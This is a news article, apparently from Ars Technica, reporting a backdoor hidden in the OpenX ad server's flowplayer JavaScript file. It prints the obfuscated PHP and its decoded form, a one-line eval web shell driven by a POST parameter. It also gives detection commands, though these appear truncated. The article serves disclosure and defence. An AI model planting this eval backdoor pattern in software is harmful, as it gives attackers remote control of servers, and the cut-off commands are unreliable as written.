If you installed the OpenX ad server in the past nine months, there's a chance hackers have a backdoor that gives them administrative control over your Web server, in many cases including passwords stored in databases, security researchers warned.

The hidden code in the proprietary open-source ad software was discovered by a reader of Heise Online (Microsoft Translator), a well-known German tech news site, and it has since been confirmed by researchers from Sucuri. It has gone undetected since November and allows attackers to execute any PHP code of their choice on sites running a vulnerable OpenX version.

Coca-Cola, Bloomberg, Samsung, CBS Interactive, and eHarmony are just a small sampling of companies the OpenX website lists as customers. The software company, which also sells a proprietary version of the software, has raised more than $75 million in venture capital as of February 2013.

The backdoor is tucked deep inside a directory in the /plugins tree in a JavaScript file called flowplayer-3.1.1.min.js. Mixed in with the JavaScript code is a malicious PHP script that lets attackers use the "eval" function to execute any PHP code. Mingling the PHP code with JavaScript makes it harder to detect the backdoor. Still, it can be found by searching for PHP tags inside .js files or, better yet, running the following administrative command:

find . -name \*.js -exec grep -l '

Another command to see if your OpenX install has the backdoor is:

$ grep -r –include “*.js” ‘

The full location of the backdoor is:

/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js

The file looks like this:

this.each(function(){l=flashembed(this,k,j)} php /*if(e) {jQuery.tools=jQuery.tools||{version: {}};jQuery.tools.version.flashembed='1.0.2'; */$j='ex'./**/'plode'; /* if(this.className ...

After decoding, the backdoor looks like this:

php $j=’explode’; $_=$j(",",’strrev,str_rot13,vastPlayer’); eval ( $_[1]($_[0]( $_POST[$_[2]])) );

Daniel Cid, a researcher at Sucuri, has spent the past several hours combing through his company's intelligence logs and found no sign that any of the thousands of websites it tracked were accessed using the backdoor.

"The backdoor is very well hidden and hard to detect, explaining why it went undetected for so long," he wrote in an e-mail to Ars. "So I assume it was being used for very targeted attacks instead of mass malware distribution."

A representative for OpenX said company officials are aware of the reported backdoor and are declining comment until they have more details. According to Heise, the backdoor code has been removed from the OpenX server and the company's security team has begun work on an official advisory.

Until we get word from OpenX, it's hard to know just how serious this reported backdoor is. Still, the potential for abuse is high. Most content management systems store their passwords in a database, according to Cid. He added, "If the attackers have access to it, they can change passwords or add new users in there giving them full admin access."

Article updated to correct detail about open-source, add detail about proprietary version.